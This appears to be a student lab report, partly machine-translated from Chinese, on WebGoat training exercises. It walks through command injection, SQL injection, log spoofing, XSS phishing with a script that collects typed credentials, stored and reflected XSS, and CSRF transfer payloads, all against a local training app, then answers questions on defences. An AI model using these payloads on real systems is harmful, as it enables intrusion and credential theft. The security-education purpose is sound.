2018-2019-2 against network technology 20165322 Exp9 Web security infrastructure

Experimental content and steps

(A) mounting WebGoat
(B) SQL injection attacks
(C) XSS attack
(D) CSRF attacks
- 1. CSRF Cross Site Request Forgery
- 2. bypass CSRF acknowledgment (CSRF Prompt By-Pass)

Problems encountered during the experiment

Basic questions answered

Experiments and experience summary

Experimental content and steps

(A) mounting WebGoat

WebGoat is OWASP organization developed a range of Java programs for web vulnerabilities experiment to illustrate the security vulnerabilities exist in the web application. WebGoat run on platforms with java virtual machine, currently provide more than 30 training courses, including: cross-site scripting attacks (XSS), access control, security thread, operating hidden field, parameter manipulation, weak session cookie , SQL blinds, digital type SQL injection, SQL injection string, web services, Open Authentication failure, dangerous HTML comment and so on.
We go directly to the link to download: WebGoat-Container-7.0.1-the WAR-exec.jar , this jar package seems to be a problem. . . At the time at several times, browser is a collapse, the cause is not clear. In short, the network is good at more patience will be able to succeed.
After the virtual machine directly to a shared directory experiments
Use the command java -jar webgoat-container-7.0.1-war-exec.jarto open Wengoat, when the display 信息: Starting ProtocolHandler ["http-bio-8080"]Description Open, you can view occupied port 8080, the experiment can not be closed terminal
Enter in your browser http://localhost:8080/WebGoatto enter Webgoat login screen, direct use of any set of user interface provides the name and password to log in.

Back to Contents

(B) SQL injection attacks

1. injection command (Command Injection)

Technical concepts: command injection attack on any parameter-driven to a site, it is a serious threat. This method of attack technology behind the technology, easy to learn, can cause damage to a wide range of system compromise. Although the number of such incredible risk, the system the Internet is vulnerable to this form of attack.
Steps
- Click Injection Flaws-Command Injection
- Right-click on AccessControlMatrix.helpthe check box, select inspect Elementthe review page elements to modify the source code, added to the end in the figure"& netstat -an & ipconfig"
- Click to viewview the network port usage and IP addresses, the attack is successful

2. Enter the string (Command Injection)

Technical concept: SQL injection attacks are a serious threat to any database-driven site as it is. An attacker can view the contents of the database without a password.
Technical principle: to construct your own SQL injection strings based on the following query.
SELECT * FROM user_data WHERE last_name = '?'
Steps:
- Click Injection Flaws-String SQL Injection
- Enter the user name query Smith' or 1=1--, which makes the query becomes: SELECT * FROM user_data WHERE last_name = 'Smith' or 1=1--'where - as a comment character, that this formula is never true style.

3. Log deceive (Log Spoofing)

Technical principle: this attack is to fool the human eye in the log file, an attacker can use this way to clear their mark in the log. An attacker can modify the contents of the log, and even written to the log script, the script returns information administrators can see through the browser.
Steps:
- Click Injection Flaws-Log Spoofing
- Enter your user name in the text box:Smith Login Succeeded for username admin
- Web page returns an error value: Login failed for username: smith Login Succeeded for username admin
- But if we fill in the User Name in Smith%0d%0aLogin Succeeded for username: adminuse 回车符0D%and 换行符%0Aallowed two-line display in the log, random password, click login
- We can see the log by admin login success.
- If you enter the user name and script what will happen?
  - Enter the user name admin <script>alert(document.cookie)</script>, the administrator can see the cookie information popups.

Back to Contents

(C) XSS attack

1. Cross-site scripting phishing attacks (Phishing with XSS)

Technical principle: always good practice to validate all input on the server side. When the user enters an illegal HTTP response is likely to cause XSS. With the help of XSS, you can implement fishing tools or add content to a certain official page. For the victims, it is difficult to find the content for threats.
Steps
- Use XSS can be further added in an existing page elements, the solution consists of two parts, we need to be used in combination:
  - Victims fill a form;
  - To read the script in the form of the collected information is sent to the attacker.
- Writing table with a user name and password input box
```
<form>
<br><br><HR><H3>This feature requires account login:</H3 ><br><br> 
Enter Username:<br><input type="text" id="user" name="user"><br> Enter Password:<br><input type="password" name = "pass"><br> 
</form><br><br><HR>
```
- Write a script that reads the username and password information by an attacker entered on the form, send the information to capture this information WebGoat
```
<script> 
function hack()
{ 
    alert("Had this been a real attack... Your credentials were just stolen." User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); 
    XSSImage=new Image; 
    XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";
}
</script>
```
- The merger more than two pieces of code, in XSS- Phishing with XSSsearch this code, we will see a form asking for a user name and password, enter your user name and password, click on the login information will be entered WebGoat captured and fed back

2. The storage type XSS attacks (Stored XSS Attacks)

Technical principle: This attack is common in message forums and other platforms, user input message when a JavaScript script, the script will be saved in the database. Because it is a message, so any time a user opens the page, the script will be taken from the database and run.
Steps:
- Enter any character in the title, message boards enter <script>alert("You've been attacked!!!");</script>, submit submit
- Click on the link in the message list, pop-up message

3. reflective XSS attacks (Reflected XSS Attacks)

Technical principle: XSS attack in reflection, the attacker can create a URL using attack script, and publish it to another site, click on it so that the victim via e-mail or other means.
Steps:
- Enter the code <script>alert("You've been attacked!!!");</script>, click on the purse at the same time give feedback on the page

Back to Contents

(D) CSRF attacks

Before operating the first to know about what is cookie
Cookie, sometimes with plural forms Cookies, refers to the data (typically encrypted) to identify the user identity of certain sites, for tracking purposes session stored on the user's local terminal. It is simply something for a state of the memory of the client.

1. CSRF Cross Site Request Forgery

Technical principle: cross-site request forgery is a way for an attack victims load means a Web page that contains a picture of. As shown in the following code:

<img src="https://www.mybank.com/me?transferFunds=5000&to=123456"/>

When the victim's browser tries to render the page, it will use the specified parameters to www.mybank.comthe "me" endpoint request. The browser will request the link to get the image, even if it is actually a funds transfer function. When you submit a request, the browser will add all the cookie associated with the site. Therefore, if the user of the site has been authenticated, and has permanent or current session cookie, then the site will not be able to legitimate user requests separate. In this way, an attacker can make the victim perform actions that they do not intend to implement, such as "buy goods", or any other function vulnerable website.

Steps:
- See right page menu Parameters and values of src, 268 and 900 respectively
- Enter the title in any parameters, input message box <img src="http://localhost:8080/WebGoat/attack?Screen=268&menu=900&transferFunds=5000" width="1" height="1" />, the form of pictures of the URL into the Message box, then the URL is not visible to other users, the user clicks the picture once, it will trigger a CSRF event, click Submit submit
- Title to generate named link (news) in the Message List. Click on the message, the current page will be downloaded and displayed the news, transferred out of 5000 yuan users, so as to achieve the purpose of CSRF attacks.

2.绕过 CSRF 确认（CSRF Prompt By‐Pass）

技术原理：跨站点请求伪造(CSRF/XSRF)是一种攻击，它欺骗受害者加载包含“伪造请求”的页面，以便使用受害者的凭据执行命令。提示用户确认或取消命令可能听起来像一个解决方案，但如果提示符是可编写脚本的，则可以忽略它。本课展示如何通过发出另一个伪造的请求来绕过这样的提示符。这也适用于一系列提示，例如向导或发出多个不相关的伪造请求。
操作步骤：
- 查看页面右侧Parameters中的src和menu值分别为274和900
- 在title框中输入任意值，message框中输入代码：
```
<iframe src="attack?Screen=274&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=274&menu=900&transferFunds=CONFIRM"> </iframe>
```
- 提交以后点击title链接

返回目录

实验过程中遇到的问题

在2019kali环境下安装webgoat时，打开网页以后显示不出课程内容，换成2018kali以后就没问题了。

基础问题回答

（1）SQL注入攻击原理，如何防御

原理：SQL注入漏洞是指在Web应用对后台数据库查询语句处理存在的安全漏洞。也就是，在输入字符串中嵌入SQL指令，在设计程序中忽略对可能构成攻击的特殊字符串的检查。后台数据库将其认作正常SQL指令后正常执行，可能实现对后台数据库进行各种操作，甚至造成破坏后台数据库等严重后果。
防御：
- 注意检查输入的特殊字符串
- 数据库中敏感数据不要明文存储
- 输入错误的异常提示应当返回尽量少的信息
  
  （2）XSS攻击的原理，如何防御
原理：XSS是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码（如，HTML代码和客户端脚本）植入到提供给其它用户使用的页面中，诱骗用户或浏览器执行一些不安全的操作或者向其它网站提交用户的私密信息。
防御：
- 检查表单提交字符串，例如检查到javascript就判定为xss攻击
- 在表单提交或者url参数传递前，对需要的参数进行过滤
  
  （3）CSRF攻击原理，如何防御
原理：CSRF跨站请求伪造，也被称为“oneclickattack”或者sessionriding，通常缩写为CSRF或者XSRF，是一种对网站的恶意利用，通过伪装来自受信任用户的请求来利用受信任的网站。是一种依赖web浏览器的、被混淆过的代理人攻击。
防御：
- 对于每一个重要的post提交页面，都使用一个验证码
- 用户在浏览其它站点前登出站点或者在浏览器会话结束后清理浏览器的cookie。

返回目录

实验总结与体会

本次实验在webgoat上操作起来很简单，理解起来却很不容易，参考了webgoat中文手册、cookie相关知识点完成了实验，感觉要想理解得更透彻还需要深入地研究才行。